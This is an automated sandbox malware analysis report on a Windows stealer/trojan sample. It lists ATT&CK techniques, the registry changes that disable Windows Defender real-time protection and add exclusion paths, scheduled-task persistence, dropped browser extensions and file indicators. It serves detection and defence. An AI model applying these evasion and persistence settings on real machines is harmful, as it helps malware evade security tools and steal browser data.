Malware Analysis Report

2024-09-11 13:04

Sample ID 240613-21w1hsthqb
Target 5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a
SHA256 5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a
Tags
discovery evasion execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a

Threat Level: Known bad

The file 5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Windows security bypass

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks BIOS information in registry

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Drops Chrome extension

Checks installed software on the system

Drops desktop.ini file(s)

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Program crash

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-13 23:03

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 23:03

Reported

2024-06-13 23:08

Platform

win7-20240611-en

Max time kernel

200s

Max time network

201s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RFIumDCEBXXU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RFIumDCEBXXU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gLbKcqvTyliDAKYm = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijLlchIpU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vEcQBTYFTXUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vEcQBTYFTXUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AClHKqYMJaBBC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijLlchIpU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\oBeyQrPqBvPiiLVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\oBeyQrPqBvPiiLVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AClHKqYMJaBBC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gLbKcqvTyliDAKYm = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gLbKcqvTyliDAKYm = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gLbKcqvTyliDAKYm = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ijLlchIpU\YzuYQx.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files (x86)\AClHKqYMJaBBC\XqKPGjy.xml C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\QCwaCRt.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\BXRjqtR.xml C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files (x86)\AClHKqYMJaBBC\eMlknwI.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files (x86)\ijLlchIpU\YjYGske.xml C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files (x86)\RFIumDCEBXXU2\QYQzOuoYaQvxi.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files (x86)\vEcQBTYFTXUn\oxqbXYe.dll C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
File created C:\Program Files (x86)\RFIumDCEBXXU2\rrZJbul.xml C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\hijxFSKlICFAhziPp.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bGTnZQDECKwDuNSWyq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\GSDaywQPJdyrKXMOz.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\erLaEdTsgGebTau.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\mHCLDjf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\86-4c-c4-c9-44-69\WpadDecision = "0" C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe N/A
